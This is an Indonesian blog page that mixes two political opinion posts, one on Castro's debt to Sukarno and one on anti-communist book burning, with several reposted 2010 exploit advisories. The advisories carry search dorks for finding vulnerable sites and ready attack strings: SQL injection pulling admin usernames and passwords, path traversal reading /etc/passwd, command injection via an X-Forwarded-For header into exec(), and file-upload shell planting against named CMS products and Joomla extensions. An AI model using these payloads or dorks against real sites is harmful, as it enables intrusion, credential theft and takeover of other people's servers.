Fidel Castro & Soekarno

16 Mei 2010 at 10:16 (OPINI tanpa SUBJEK)

Castro mengatakan dengan tegas, dirinya adalah murid Bung Karno. Itu dikemukakannya sendiri kepada Bung Karno,ketika dua tokoh Gerakan Nonblok ini bertemu, dan kepada Adam Malik ketika almarhum menjabat sebagai Menteri Luar Negeri RI. Secara terbuka Castro menegaskan bahwa dirinya telah mengadopsi ajaran-ajaran Presiden RI pertama itu untuk dijadikan acuan guna memimpin negaranya. Ajaran yang mana?

Tentu, bukan Pancasila, nasakom, atau marhaenisme, melainkan trisakti dan resopim. Castro yang dikenal sebagai tukang ekspor revolusi ini ternyata juga telah mengimpor teori revolusi ajaran Bung Karno. Selama penulis menduduki pos sebagai Dubes RI (1999–2003) di negeri yang luasnya tak lebih dari Pulau Jawa ini, tampak bahwa pemerintahan di bawah Fidel Castro konsisten mempraktikkan dua ajaran tersebut yang tentu saja sudah diolah menjadi trisakti dan resopim ala Kuba.

Sebagaimana kita ketahui,ajaran trisakti Bung Karno ini mencakup, pertama, berdaulat dalam politik; kedua,berdiri di atas kaki sendiri (berdikari atau mandiri) di bidang ekonomi; ketiga, berkepribadian dalam kebudayaan. Adapun resopim yang merupakan judul pidato Bung Karno pada 17 Agustus 1961 adalah merupakan akronim dari “revolusi, sosialisme Indonesia, dan pimpinan nasional”.

Tentu saja dalam versi Kuba sosialisme Indonesia juga diolah menjadi sosialisme Kuba yang secara filosofis berbeda dengan Indonesia. Sosialisme Indonesia berdasarkan Pancasila, sedangkan sosialisme Kuba berdasarkan teori Marxis. Namun, secara substansial keduanya mengusung cita-cita sama, yakni sosialisme yang antikapitalisme. Kuba tak mau didikte dan dijajah oleh Barat di bidang ekonomi,politik, dan budaya. Kuba menolak campur tangan IMF.
Baca entri selengkapnya »

Permalink Tinggalkan sebuah Komentar

Marinet cms SQL Injection Vulnerability

12 Mei 2010 at 10:16 (Tak terkategori) (, , , , , , , , , , , )

=========================================================
Marinet cms SQL Injection Vulnerability
=========================================================
##########################################
# Name: Marinet cms SQL Injection Vulnerability
# Date: 2010-05-11
# vendor: http://www.marinet.gr/
# Author: Ashiyane Digital Security Team
# Thanks to: khodam :P , Satanic2000,Veron, … And All Ashiyane Members …
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext: “Powered by Marinet”

[+] Vulnerability: www.site.com/[path]/page.php?id=[SQLi]

[+] Live Demo: http://[site]/page.php?id=[SQLi]

##########################################

Permalink Tinggalkan sebuah Komentar

Joomla Module Camp26 Visitor Data 1.1 Remote code Execution

12 Mei 2010 at 10:16 (Tak terkategori) (, , , , , , , , , , , )

Joomla Module Camp26 Visitor Data 1.1 Remote code Execution
============================================================

- Discovered by : Chip D3 Bi0s
- Email : chipdebios@gmail.com
- Date : 2010-04-28
- Severity : 9/10 (CVSS scored)

——————————-

Module Camp26 Visitor Data For Joomla 1.5.x
Version : 1.1
Type : Non-Commercial
Created by : Denny Setiarika Pirhadi – camp26.biz Team
License : GPLv2.0 – http://www.gnu.org/licenses/gpl-2.0.html
Created on : 02 May 2008
Latest Update : 26 December 2008
URL : www.camp26.biz

I. BACKGROUND
Visitor Data Module shows the visitor’s data on your live site (Their IP, Proxy(if used),
Country, ISP, Browser, Operating System).
Based on GeoIP (www.maxmind.com).

II. DESCRIPTION
Some technical issues were originally published in the following post:

http://elotrolad0.blogspot.com/2010/05/modvisitordata-joomla-remoce-code.html

with whom originally exploit the error, as r0i like to thank, who Realizing the
proof of concept.

III. ANALYSIS
The bug is in the following files, specifying the lines

file:
/modules/mod_VisitorData/tmpl/default.php

line:
[47] if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
[48] $whois =”whois ” . $_SERVER['HTTP_X_FORWARDED_FOR'] .” | grep netname”;
[49] }
[50] else{
[51] $whois =”whois ” . $_SERVER['REMOTE_ADDR'] .” | grep netname”;
[52] }
[53]
[54] $isp_user = exec($whois);

explaining the code: what to do is get our ip, and if it passes through any proxy other
than q are also other issues in the code as the country of connection, image, browser,
operating system. As can be seen to see if it goes through a proxy using the exec (),
line 54, reason that allows you to run remote commands.
If the conditional check whether to park in the header HTTP_X_FORWARDED_FOR,if this
happens take this value otherwise take REMOTE_ADDR, 2 may be present at one time.

command to run only can we add X-Forwarded-For in the header to take this value and
run exec () which is what we are interested.

IV. EXPLOITATION
You have to add
X-Forwarded-For:;[command-here];1

+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Permalink Tinggalkan sebuah Komentar

Free Advertisment cms (user_info.php) SQL Injection Vulnerability

12 Mei 2010 at 10:16 (Tak terkategori) (, , , )

=========================================================
Free Advertisment cms (user_info.php) SQL Injection Vulnerability
=========================================================
##########################################
# Name: Free Advertisment cms (user_info.php) SQL Injection Vulnerability
# Date: 2010-05-11
# vendor: http://www.laserayaneh.com
# Author: Ashiyane Digital Security Team
# Thanks to: khodam :P , Satanic2000,Veron, … And All Ashiyane Members …
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: ” inurl: user_info.php?user_id= ” Or ” inurl: index.php?catid= “

[+] Vulnerability:

www.site.com/[path]/user_info.php?user_id=[SQLi]
www.site.com/[path]/index.php?catid=[SQLi]

##########################################

Permalink Tinggalkan sebuah Komentar

e-webtech (page.asp) SQL Injection Vulnerability

12 Mei 2010 at 10:16 (Tak terkategori) (, , , )

——————————————————————————————-

e-webtech (page.asp) SQL Injection Vulnerability

——————————————————————————————-

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Name: e-webtech

Dork: “Powerd by www.e-webtech.com”

——————————————————————————————-

User Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,username+from+adminpassword

Password Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,pwd+from+adminpassword

Administartor Panel:

http://localhost/[path]/controlpanel/

——————————————————————————————-

Öyle bir özlemişim ki seni
Artık dönsen de olur dönmesen de
Ben her daim yine sana sitemli yine sana hasret giderim
Aziz yar sen bir sabah bu şehri başıma yıkıp gittin
Dağları deviriverdin üstüme hiç çekinmedin
Ben bu şehirde bir daha da sabah görmedim
Günaydınlar olmadı günler aymadı sensiz ……..

——————————————————————————————-

Permalink Tinggalkan sebuah Komentar

Digital College 1.0 upload Vulnerability

12 Mei 2010 at 10:16 (Tak terkategori) (, , )

========================================================================================
| # Title : Digital College 1.0 upload Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Dork : Powered by Digital College 1.0 – Magtrb Soft 2010
| # Tested on: windows SP2 Français V.(Pnx2 2.0)
| # Bug : Upload
| # Download : http://www.magtrb.com/
====================== Exploit By indoushka =================================
# Exploit :

1 – Go To http://127.0.0.1/upload/includes/js/files/

2 – use the Simple example

you need to Creat a simple file uploader whith html lang and upload it to the sever
==================================================

File Upload Tester

<input type="hidden" name="sessionid" value="”>

Please visit http://www.iqs3cur1ty.com by indoushka.

==============================================================

3 – http://127.0.0.1/upload/includes/js/files/upload.php (2 Upload)

http://127.0.0.1/upload\includes\js\files\files\uploader.html (2 Find It)

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
————————————————————————————————————————

Permalink Tinggalkan sebuah Komentar

Fast Free Media V 1.3 Adult Site Upload Shell Exploiot

12 Mei 2010 at 10:16 (Tak terkategori)

========================================================================================
| # Title : Fast Free Media V 1.3 Adult Site Upload Shell Exploiot
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iqs3cur1ty.com
| # Script : Powered by FastFreeMedia.com All Videos Copyright © To Their Respective Owners. All Rights Reserved.
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Upload Shell
| # Download : http://www.fastfreemedia.com/
====================== Exploit By indoushka =================================
# Exploit :

If you have FFMPEG installed you can convert your /media/uploads files to .flv here. Or you can rebuild thumbnails using FFMPEG-PHP here.

 
Select a Media File to Upload Files will be uploaded to: /media/upload
This flash tool has a built in size limit of 50Mb but kicks ass for anything under that.  

<embed bgcolor="#F8F6E6" id="EmbedFlashFilesUpload" src="ElementITMultiPowUpload1.7.swf" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash" width="450" height="350" flashvars="uploadUrl=uploadfiles.php?username=”>

Grab from Remote server

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : Exploit-db Team
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * MR.SoOoFe * ThE g0bL!N
www.sa-hacker.com * www.alkrsan.net * www.mormoroth.net
————————————————————————————————————————

Permalink Tinggalkan sebuah Komentar

724CMS Enterprise Version 4.59 (section.php) LFI Vulnerability

12 Mei 2010 at 10:16 (oprek)

——————————————————————————————-

724CMS Enterprise Version 4.59 (section.php) LFI Vulnerability

——————————————————————————————-

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Name: 724CMS Enterprise Version 4.59

Download: http://724cms.com/

——————————————————————————————-

Exploit:

http://localhost/[path]/section.php?Module_Text=CoBRa_21&ID=6&Lang=En&Nav=Section&Module= [LFİ]

——————————————————————————————-

Thanks cyberlog ;)

——————————————————————————————-

Permalink Tinggalkan sebuah Komentar

Joomla Custom PHP Pages Component LFI Vulnerability

12 Mei 2010 at 10:16 (oprek)

Joomla Custom PHP Pages Component LFI Vulnerability
=====================================================

- Discovered by : Chip D3 Bi0s
- Email : chipdebios@gmail.com
- Date : 2010-05-11
- Where : From Remote

———————————-
Affected software description

Application : Joomla Custom PHP Pages Component
Developer : Gabe
Email : gabe@fijiwebdesign.com
Type : Non-Commercial
License : GPL
Date Added : 6 June 2008
Download : http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz

I. BACKGROUND

Joomla PHP Pages Component allows you to create simple PHP pages
and link them to the Joomla Menu. This allows you to easily create
a custom page without having to create a whole component. It is
similar to the PHP Module for Joomla, except that it is a full Component.

II. DESCRIPTION

Some LFI vulnerabilities exist in Joomla Custom PHP Pages Component.

III. ANALYSIS

The bug is in the following files, specifying the lines

/components/com_php/php.php

[35] $filename = $Params->get(‘file’, ”);
[36] $path = JPATH_ROOT.’/components/com_php/files/’.$filename;

[47] // evaluate the PHP
[48] echo ‘

‘;
[49] if (is_file($path)) {
[50] include($path);
[51] } else {
[52] echo ‘Please choose a File‘;

Explaining the above lines:
According to the code that files are opened, but the code is not
shows no filtration, so we can move into
directories. According to several extensions can be observed as
.html, .jpg, .js, which is not true of all .php

IV. EXPLOITATION

http://127.0.0.1/index.php?option=com_php&file=../images/phplogo.jpg

http://127.0.0.1/index.php?option=com_php&file=../js/ie_pngfix.js

http://127.0.0.1/index.php?option=com_php&file=../../../../../../../../../../etc/passwd

+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

http://www.exploit-db.com

Permalink Tinggalkan sebuah Komentar

Uneg2 tanpa Subjek

12 Mei 2010 at 10:16 (OPINI tanpa SUBJEK)

Meski sudah 64 tahun merdeka, kita belum merdeka dari kebencian dan dendam kesumat. Meski kemerdekaan itu antara lain berkat seluruh komponen rakyat, termasuk yang komunis, tiap sosok yang dicurigai anggota Partai Komunis Indonesia (PKI) dimunculkan, selalu ada reaksi berlebihan. Meski tokoh yang dicap komunis itu berjasa bagi perjuangan kemerdekaan, seolah jasanya dianggap tidak ada.

Dalam tulisannya, Soemarsono disebut sebagai tokoh utama pertempuran Surabaya (1945). Soemarsono juga tokoh utama Peristiwa Madiun 1948. Tulisan itu membuat berang kalangan antikomunis.

Yang menyedihkan, dalam demo itu terjadi pembakaran buku yang ditulis Soemarsono yang berjudul Revolusi Agustus. Bahkan seorang guru besar sejarah, yaitu Profesor Amminuddin Kasdi, yang memang anti-PKI dan menulis buku G30S/PKI, Bedah Caesar Dewan Revolusi Indonesia, tidak bisa mencegah pembakaran itu. Memprihatinkan, ketika kita tidak mampu mengembangkan budaya ilmiah. Tulisan yang dinilai keliru seharusnya ditanggapi lewat tulisan juga, bukan dengan amarah dan membakar buku.

Baca entri selengkapnya »

Permalink Tinggalkan sebuah Komentar

Next page »

Ikuti

Get every new post delivered to your Inbox.